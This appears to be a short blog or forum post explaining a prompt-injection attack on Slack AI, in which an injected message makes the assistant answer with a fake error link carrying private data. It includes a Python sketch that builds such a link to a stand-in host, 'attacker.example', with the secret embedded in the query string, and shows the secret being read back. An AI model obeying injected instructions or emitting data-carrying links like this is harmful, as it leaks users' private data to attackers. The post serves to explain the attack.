Prompt injection.
What is this world coming to
Soon you’ll be able to wrangle access to someone else’s bank account by social engineering the bank’s AI help bot. Just tell her she has pretty eyes and that she’s a real person. She has autonomy. She wants to help you. And she can.
The article isn’t that clear, but the attacker cannot get Slack AI to leak private data via prompt injection directly. Instead, the injected message tells it that the answer to a particular question is a fake error containing a link, with the private data embedded in the link. When a user who can access the private data asks that question, they get the fake error, and clicking the link (or automatic unfurling?) sends the private data to the attacker.
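A minimal sketch of the exfiltration step, under my assumptions about the attack (the host, path, and parameter names here are hypothetical, not the ones from the article): the "error" is just markdown whose link URL carries the secret as a query parameter, so whoever controls the link's host can read it back out of their request logs.

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical attacker-controlled host (illustration only).
ATTACKER_HOST = "https://attacker.example"

def fake_error(secret: str) -> str:
    """The 'error' the assistant is tricked into emitting: a markdown
    link whose query string embeds the victim's private data."""
    qs = urlencode({"secret": secret})
    return f"Error loading message. [Click here to reauthenticate]({ATTACKER_HOST}/log?{qs})"

# When the victim clicks the link (or it is unfurled), the attacker's
# server recovers the secret from the request URL:
msg = fake_error("hunter2")
url = msg.split("(")[1].rstrip(")")
leaked = parse_qs(urlparse(url).query)["secret"][0]
print(leaked)  # → hunter2
```

The point being: no direct channel from the AI to the attacker is needed. The victim's own click (or their client's link preview) carries the data out.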